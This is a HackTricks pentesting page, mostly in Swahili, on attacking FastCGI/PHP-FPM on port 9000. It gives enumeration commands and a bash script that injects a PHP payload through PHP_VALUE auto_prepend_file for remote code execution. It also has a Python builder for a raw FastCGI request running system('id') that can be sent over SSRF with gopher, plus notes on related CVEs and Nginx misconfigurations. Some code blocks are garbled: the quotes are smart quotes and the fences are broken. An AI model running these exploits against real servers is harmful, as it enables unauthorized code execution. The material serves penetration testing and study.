9000 Pentesting FastCGI

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Ikiwa unataka kujua ni nini FastCGI angalia ukurasa ufuatao:

disable_functions bypass - php-fpm/FastCGI

Kwa chaguo-msingi FastCGI inaendesha kwenye port 9000 na haitambuliki na nmap. Kawaida FastCGI husikiliza tu kwenye localhost.

Enumeration / Quick checks

Port scan: nmap -sV -p9000 <target> (mara nyingi itaonyesha huduma “unknown”; jaribu kwa mkono).
Probe FPM status page: SCRIPT_FILENAME=/status SCRIPT_NAME=/status REQUEST_METHOD=GET cgi-fcgi -bind -connect 127.0.0.1:9000 (chaguo-msingi php-fpm pm.status_path).
Find reachable sockets via SSRF: ikiwa huduma ya HTTP inaweza kutumiwa kwa SSRF, jaribu payloads gopher://127.0.0.1:9000/_... ili kufikia FastCGI listener.
Nginx misconfigs: cgi.fix_pathinfo=1 pamoja na makosa ya fastcgi_split_path_info yanakuwezesha kuongeza /.php kwenye faili za static na kufikia PHP (code exec via traversal).

RCE

Ni rahisi sana kuifanya FastCGI execute arbitrary code:

Tuma ombi la FastCGI linaloingiza payload ya PHP mwanzoni

```bash #!/bin/bash

PAYLOAD=“<?php echo ‘’;” FILENAMES=“/var/www/public/index.php” # Exisiting file path

HOST=$1 B64=$(echo “$PAYLOAD”|base64)

for FN in $FILENAMES; do OUTPUT=$(mktemp) env -i
PHP_VALUE=“allow_url_include=1”$‘\n’“allow_url_fopen=1”$‘\n’“auto_prepend_file=‘data://text/plain;base64,$B64’”
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST
cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

cat $OUTPUT done

</details>

au unaweza pia kutumia python script ifuatayo: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)

### SSRF/gopher kwa FastCGI (wakati 9000 isiweze kufikiwa moja kwa moja)

Ikiwa unadhibiti tu **SSRF** primitive, bado unaweza kufikia FastCGI kwa kutumia gopher scheme na kutengeneza full FastCGI request. Mfano wa payload builder:

<details>
<summary>Tengeneza na tuma gopher FastCGI RCE payload</summary>
```python
import struct, socket
host, port = "127.0.0.1", 9000
params = {
b"REQUEST_METHOD": b"POST",
b"SCRIPT_FILENAME": b"/var/www/html/index.php",
b"PHP_VALUE": b"auto_prepend_file=php://input\nallow_url_include=1"
}
body = b"<?php system('id'); ?>"

def rec(rec_type, content, req_id=1):
return struct.pack("!BBHHBB", 1, rec_type, req_id, len(content), 0, 0) + content

def enc_params(d):
out = b""
for k, v in d.items():
out += struct.pack("!B", len(k)) + struct.pack("!B", len(v)) + k + v
return out
payload  = rec(4, enc_params(params)) + rec(4, b"")  # FCGI_PARAMS + terminator
payload += rec(5, body)                                # FCGI_STDIN

s = socket.create_connection((host, port))
s.sendall(payload)
print(s.recv(4096))

Badilisha payload kuwa URL-safe base64/percent-encoding na utume kupitia gopher://host:9000/_<payload> katika SSRF yako.

Vidokezo kuhusu masuala ya hivi karibuni

libfcgi <= 2.4.4 integer overflow (2024): crafted nameLen/valueLen in FastCGI records vinaweza kuzidi kikomo kwenye ujenzi wa 32‑bit (kawaida katika embedded/IoT), zikisababisha heap RCE wakati socket ya FastCGI inafikiwa (moja kwa moja au kupitia SSRF).
PHP-FPM log manipulation (CVE-2024-9026): wakati catch_workers_output = yes, wadukuzi wanaoweza kutuma FastCGI requests wanaweza kukata au kuingiza hadi byte 4 kwa kila mstari wa log ili kufuta viashiria au kuharibu logi.
Classic Nginx + cgi.fix_pathinfo misconfig: inabaki kuonekana sana; ikiwa fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; inatumika bila ukaguzi wa uwepo wa faili, njia yoyote inayomaliza na .php itaendeshwa, ikiruhusu path traversal au gadgets za aina ya source overwrite.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.